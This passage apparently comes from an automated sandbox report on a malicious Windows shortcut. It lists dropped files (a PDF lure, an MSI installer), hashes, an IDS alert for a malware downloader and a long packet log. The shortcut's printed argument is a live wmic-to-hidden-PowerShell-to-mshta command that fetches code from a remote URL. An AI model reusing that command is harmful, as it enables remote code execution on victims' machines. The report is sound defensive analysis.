                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                          C:\Users\user\AppData\Roaming\API _Guide.pdf

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PDF document, version 1.4, 6 pages
                                          Category:dropped
                                          Size (bytes):59085
                                          Entropy (8bit):7.650082635245118
                                          Encrypted:false
                                          SSDEEP:768:CFa0STkGez3ruTYFa7fcRRA4Ypom+4EytNt91YG/R1rIJoK7DtR3NMO2Wc1niwx:CF8T3ezda7S8ymVtLVX5Kb2pL
                                          MD5:FA61BD587E39B3E146951C9B476A7273
                                          SHA1:315CFFAAA2D889CFECDEE26AAF08725316620F4B
                                          SHA-256:D16978FF7CE6DD503E84C59F659C29E1E595A9ACAF8626EDACCE9C8E9A593ACA
                                          SHA-512:35F6A4A0EBBDC7B35EAC1FACE9153C406AE1D2282BF0135BC4AAF99002520AA94A2B25D21359A0421AE2C43255EFD9E425D93F582CBD8C81E99401FF303B040F
                                          Malicious:false
                                          Preview:%PDF-1.4.%.....11 0 obj.<<./ca 1./BM /Normal.>>.endobj.12 0 obj.<<./CA 1./ca 1./LC 0./LJ 0./LW 3./ML 4./SA true./BM /Normal.>>.endobj.14 0 obj.<<./Length 293./N 3./Filter /FlateDecode.>>.stream.x.}..J......(.....28.h..iRpi"..V..S..A.OHS..tspu+....c(....#....AR.x.......@.....?..F..[V[..G@`*...dK..$...O.K..o...@...6..`.O.,f'..O. .a.sx.0A..6..vf...8....{c7..%op..Z.:u.....Q.......0Q.F.....*....(.S....DGACAa..j.g.rx....]..s...PxM.......c...vhO.<..v....-X}...b3~...*....mDJH.T~...K..endstream.endobj.15 0 obj.<<./Type /XObject./Subtype /Image./Width 342./Height 117./ColorSpace [/ICCBased 14 0 R]./BitsPerComponent 8./Filter [/FlateDecode /DCTDecode]./DecodeParms [null <<./Quality 60.>>]./Length 3139.>>.stream.x...wP.....!.......J/.A..0.AZ. .#..4iB.......J....A.J.]$@.....@......v..7...y.g...=s.~..s..+}...8XX.X.9.X.899..Ex.....<.'.(.|BQFA^....U.}My..V....hs....G.S..3...& NNNn..$/................0`......a z+ .. (..... .0.........C....f...P.d.5l......E....f.Lb><*.Sr..u_..E.,K.:.F......8

                                          C:\Users\user\AppData\Roaming\XZJKPUBX.msi

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Veteran, Author: Chapman Faquir, Keywords: Installer, Comments: This installer database contains the logic and data required to install Veteran., Template: Intel;1033, Revision Number: {783BAB48-3720-490C-942D-60EE5BDFBDA3}, Create Time/Date: Mon Dec 30 11:27:28 2024, Last Saved Time/Date: Mon Dec 30 11:27:28 2024, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
                                          Category:dropped
                                          Size (bytes):1478656
                                          Entropy (8bit):7.9821555527658825
                                          Encrypted:false
                                          SSDEEP:24576:QHbU+uhk5MJeNBpQWNUiOV8C8PEzpLxeEpcdZdQ2t0Z67oosDIzjMqPmLaeQb21/:ibU+uhhABSAOVgEzpLgrQM0cohDIk0mT
                                          MD5:667496F7272255EE2F22BAC54C9EE2CB
                                          SHA1:204D329851B6D9D60FEE19638EFB6A8AD214206F
                                          SHA-256:AB6A1626B35D91D7A96D227E993F9C71A6DCD7072E6930EE44237527858CFA70
                                          SHA-512:72492E5A7E1CE53F58C9313858F7F02C85FC05745B7F92BF2C217723A0520A34FF8B5F618C4C460F7503EF6ABE9DBABF484EF08EF24E9BDB0242241DC7446061
                                          Malicious:false
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                          Download File
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):55
                                          Entropy (8bit):4.306461250274409
                                          Encrypted:false
                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                          Malicious:false
                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                          \Device\ConDrv

                                          Download File
                                          Process:C:\Windows\System32\wbem\WMIC.exe
                                          File Type:ASCII text, with CRLF, CR line terminators
                                          Category:dropped
                                          Size (bytes):160
                                          Entropy (8bit):5.083203110114614
                                          Encrypted:false
                                          SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MghQTV3OAFJQAive2:Yw7gJGWMXJXKSOdYiygKkXe/egGTRdeF
                                          MD5:2B5F43089A1954FE3CE86D0022775C11
                                          SHA1:891B79496B229CFFCBF4E3CDB350FD1C290A38C5
                                          SHA-256:B55B1791DD48A0E73BEC8B47BE6ADE6A5091E944EF1F898708AE72A752A28DB7
                                          SHA-512:E79E055FACA0224F2324ED73F6413B31B413E5C0D7080E786865F6DB9B72113C99B8E0D746528C61A1AC793CB2F142C7C86614EFD0844FA46DF3042F645F83A3
                                          Malicious:false
                                          Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 3560;...ReturnValue = 0;..};....

                                          Static File Info

                                          General

                                          File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                          Entropy (8bit):2.641251841348939
                                          TrID:
                                          • Windows Shortcut (20020/1) 100.00%
                                          File name:GYede3Gwn0.lnk
                                          File size:1'922 bytes
                                          MD5:560d5d5e43b6d2ac1bdfb3ca4156e6d7
                                          SHA1:51ac4281c6bab97eed94a529d901cd29cc15f36d
                                          SHA256:98a28a0d4d028d446811b620e519d258feb8dc4c494705f372ae0c7c22fa9804
                                          SHA512:21ffe45bc4ac877c891aadba47babce7b1b71e4c4341ac9e41d735984957f724cf65864b8c41bc2dcd61ba4c20b4a5d78506b0a7e0e9f59d0341f7b46c92104e
                                          SSDEEP:24:8AyH/BUlgKN4ez+/3RkWNdk6Zoc+Nsqdd79dsrabqYnu7AQ:89uGeURldkUkzdJ9AaeIQ
                                          TLSH:6B415E146AE90B11F3B38E72547AB321957F7C8AEEB38F0C018196C91576610E875F5F
                                          File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                          File Icon

                                          Icon Hash:72d282828e8d8dd5

                                          Static Windows Shortcut Info

                                          General

                                          Relative Path:..\..\..\..\..\..\..\Windows\System32\Wbem\wmic.exe
                                          Command Line Argument:process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')"
                                          Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-12-31T10:38:08.665503+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.64974392.113.18.193443TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 31, 2024 10:38:02.084533930 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:02.084559917 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:02.084711075 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:02.099184036 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:02.099200010 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:02.779134035 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:02.779247046 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.145663977 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.145709038 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.146770000 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.146847010 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.149759054 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.195328951 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.336049080 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.336117983 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.430133104 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.430177927 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.430226088 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.430227995 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.430258036 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.430279016 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.430291891 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.430300951 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.430330992 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.431624889 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.431689978 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.431698084 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.431714058 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.431742907 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.431767941 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.523271084 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.523308992 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.523354053 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.523375034 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.523401022 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.523420095 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.525573015 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.525605917 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.525636911 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.525641918 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.525681973 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.526403904 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.526428938 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.526464939 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.526469946 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.526504993 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.528306961 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.528327942 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.528368950 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.528373957 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.528409958 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.528422117 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.617294073 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.617360115 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.617419004 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.617439985 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.617458105 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.617480993 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.618985891 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.619031906 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.619055033 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.619060040 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.619112968 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.619980097 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.620023966 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.620054007 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.620059967 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.620104074 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.620520115 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.620582104 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.620589972 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.620594978 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.620630980 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.620650053 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.621418953 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.621464968 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.621480942 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.621485949 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.621521950 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.621551991 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.622160912 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.622203112 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.622222900 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.622246027 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.622260094 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.622294903 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.712249994 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.712299109 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.712337971 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.712348938 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.712372065 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.712395906 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.731136084 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.731184959 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.731215954 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.731225014 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.731256962 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.731273890 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.745364904 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.745413065 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.745436907 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.745445013 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.745492935 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.759767056 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.759814024 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.759844065 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.759851933 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.759885073 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.759903908 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.764422894 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.764473915 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.773967028 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.774035931 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.774055004 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.774061918 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.774116039 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.790292978 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.790345907 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.790366888 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.790374041 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.790399075 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.790431023 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.804593086 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.804641962 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.804670095 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.804677010 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.804719925 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.818932056 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.818980932 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.819010019 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.819021940 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.819051981 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.819065094 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.862008095 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.862086058 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.862101078 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.862128019 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.862181902 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.877226114 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.877269030 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.877314091 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.877329111 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.877350092 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.877432108 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.877458096 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.877496958 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.877516985 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.877521992 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.877551079 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.877568007 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.877690077 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.877727032 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.877752066 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.877756119 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.877787113 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.877801895 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.877914906 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.877953053 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.877976894 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.877981901 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878026962 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.878050089 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.878110886 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878159046 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878174067 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.878179073 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878218889 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.878236055 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.878256083 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878293991 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878324032 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.878328085 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878356934 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.878379107 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.878407001 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878443956 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878468037 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.878473043 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878508091 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.878525019 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.878695011 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878745079 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.878750086 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878813028 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:03.878829956 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.878860950 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.879733086 CET49711443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:03.879745960 CET4434971192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:06.185952902 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:06.186007977 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:06.186088085 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:06.193608046 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:06.193644047 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:06.835220098 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:06.835295916 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:06.836924076 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:06.836944103 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:06.837196112 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:06.843753099 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:06.887329102 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.158720970 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.204159021 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.310697079 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.310710907 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.310765982 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.310833931 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.310863018 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.310863018 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.310889006 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.310920954 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.310959101 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.312606096 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.312623978 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.312786102 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.312798977 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.312870979 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.422097921 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.422121048 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.422202110 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.422202110 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.422231913 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.422485113 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.423039913 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.423094988 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.423108101 CET4434973192.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.423108101 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.423201084 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.426947117 CET49731443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.703280926 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.703321934 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:07.703603029 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.703603029 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:07.703636885 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.352049112 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.353930950 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.353951931 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.665513039 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.719790936 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.755321980 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.755337954 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.755354881 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.755361080 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.755392075 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.755412102 CET49743443192.168.2.692.113.18.193
                                          Dec 31, 2024 10:38:08.755429983 CET4434974392.113.18.193192.168.2.6
                                          Dec 31, 2024 10:38:08.755450010 CET49743443192.168.2.692.113.18.193
